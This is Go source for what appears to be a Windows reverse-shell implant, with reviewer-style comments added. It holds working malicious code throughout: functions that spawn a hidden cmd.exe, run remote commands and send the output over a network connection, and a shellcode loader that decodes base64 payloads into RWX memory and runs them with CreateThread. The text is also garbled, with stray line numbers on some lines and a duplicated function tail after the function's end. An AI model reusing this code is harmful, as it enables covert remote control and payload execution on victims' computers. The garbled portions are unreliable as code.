
     1  // +build windows !linux !darwin !freebsd
     2  
     3  package shell
     4  
     5  import (
     6  	"encoding/base64"
     7  	"net"
     8  	"os/exec"
     9  	"syscall"
    10  	"unsafe"
    11  )
    12  
// Allocation-type flags passed to VirtualAlloc by ExecShellcode. The values
// are the Win32 MEM_COMMIT / MEM_RESERVE constants; ExecShellcode ORs them
// together so one call both reserves and commits the region.
//
// NOTE(review): the "// +build" line at the top of this file ORs its terms
// (windows OR !linux OR !darwin OR !freebsd), so on its own it excludes almost
// nothing; it is the _windows.go filename suffix that actually restricts this
// file to GOOS=windows.
const (
	MEM_COMMIT  = 0x1000
	MEM_RESERVE = 0x2000
)
    17  
// GetShell builds an *exec.Cmd for the Windows command interpreter and returns
// it to be used in a reverse shell.
//
// The command is not started here; the caller attaches stdio and runs it. It
// is configured with HideWindow so the child gets no visible console window.
func GetShell() *exec.Cmd {
	const interpreter = "C:\\Windows\\System32\\cmd.exe"
	shell := exec.Command(interpreter)
	shell.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	return shell
}
    25  
// ExecuteCmd runs the provided command through cmd.exe
// and redirects the result to the provided net.Conn object.
//
// The command is passed as the single argument after "/c", with a trailing
// newline appended (the reason for the newline is not visible here). Stdout
// and stderr both go straight to conn; Stdin is not set, so the child reads
// from the null device. The error from cmd.Run (launch failure or non-zero
// exit status) is not checked, so a failed run is indistinguishable from one
// that produced no output.
func ExecuteCmd(command string, conn net.Conn) {
	//cmd_path := "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
	cmd_path := "C:\\Windows\\System32\\cmd.exe"
	cmd := exec.Command(cmd_path, "/c", command+"\n")
	// HideWindow suppresses the child's console window.
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	cmd.Stdout = conn
	cmd.Stderr = conn
	// Blocks until cmd.exe exits; the returned error is dropped.
	cmd.Run()
}
    37  
// InjectShellcode decodes a base64 encoded shellcode and calls ExecShellcode on the decode value.
//
// An empty string is a no-op, and so is input that is not valid standard
// (padded) base64: the decode error is dropped rather than reported, so a
// malformed payload fails silently. ExecShellcode runs on its own goroutine,
// which nothing here waits on or can stop.
func InjectShellcode(encShellcode string) {
	if encShellcode != "" {
		// StdEncoding expects '=' padding; any decode error means the
		// payload is silently ignored.
		if shellcode, err := base64.StdEncoding.DecodeString(encShellcode); err == nil {
			// Fire-and-forget: the goroutine's lifetime is untracked.
			go ExecShellcode(shellcode)
		}
	}
}
    46  
// ExecShellcode maps a memory page as RWX, copies the provided shellcode to it
// and executes it by starting a thread at that address (CreateThread, called
// through syscall.Proc.Call).
//
// Concretely: VirtualAlloc reserves and commits len(shellcode) bytes as
// PAGE_EXECUTE_READWRITE, the bytes are copied in with a plain loop, and
// CreateThread is pointed at the region's base. The function returns as soon
// as the thread is created; the thread handle is discarded and never waited on.
//
// Failure modes visible in the code:
//   - MustLoadDLL / MustFindProc panic if kernel32.dll or either export
//     cannot be resolved.
//   - VirtualAlloc's result is not checked; on failure it is 0 and the copy
//     loop then writes through a nil-derived pointer (access violation).
//   - The cast to *[990000]byte bounds the copy: a payload longer than that
//     panics with index out of range before anything is executed.
//   - An empty payload still reaches VirtualAlloc with size 0 and CreateThread;
//     what happens then is not determined by this code.
//
// From a detection standpoint, a private RWX commit followed by a thread whose
// start address lies in non-image-backed memory is a well-known indicator that
// memory scanners and EDR thread-creation telemetry key on.
func ExecShellcode(shellcode []byte) {
	// Resolve kernel32.dll, VirtualAlloc and CreateThread (all panic on failure).
	kernel32 := syscall.MustLoadDLL("kernel32.dll")
	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
	procCreateThread := kernel32.MustFindProc("CreateThread")
	// Reserve and commit space for the shellcode as RWX. r1 is the base
	// address (0 on failure); the error return is dropped.
	address, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, syscall.PAGE_EXECUTE_READWRITE)
	// Reinterpret the region as a fixed 990000-byte array so it can be indexed
	// from Go; this is what caps the payload size.
	addrPtr := (*[990000]byte)(unsafe.Pointer(address))
	// Copy shellcode byte by byte into the RWX region.
	for i, value := range shellcode {
		addrPtr[i] = value
	}
	// Start a thread at the region's base; the handle and thread id are
	// discarded, and this function does not wait for the thread.
	procCreateThread.Call(0, 0, address, 0, 0, 0)
}
    62  	procCreateThread.Call(0, 0, address, 0, 0, 0)
    63  }